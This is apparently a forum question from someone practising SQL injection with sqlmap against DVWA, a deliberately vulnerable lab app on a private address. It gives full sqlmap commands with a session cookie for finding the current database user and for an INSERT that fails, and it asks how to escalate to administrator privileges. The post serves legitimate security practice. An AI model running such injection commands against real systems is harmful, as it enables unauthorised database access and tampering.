I'm using sqlmap to exploit databases in a DVWA-project.
However, after having exploited the database, I executed the following command to learn that the user is dvwa@%:
sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --current-user
I'm trying to INSERT
something into the tables, with these commands:
sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --sql-query="INSERT INTO guestbook (comment,name) VALUES ('foo','bar');"
However, this fails - although a basic SELECT
statement works fine.
I guess the dvwa@% user doesn't have privileges to INSERT/UPDATE
.
Is it possible for sqlmap to automatically obtain administrator privileges for the database (in this case DVWA)?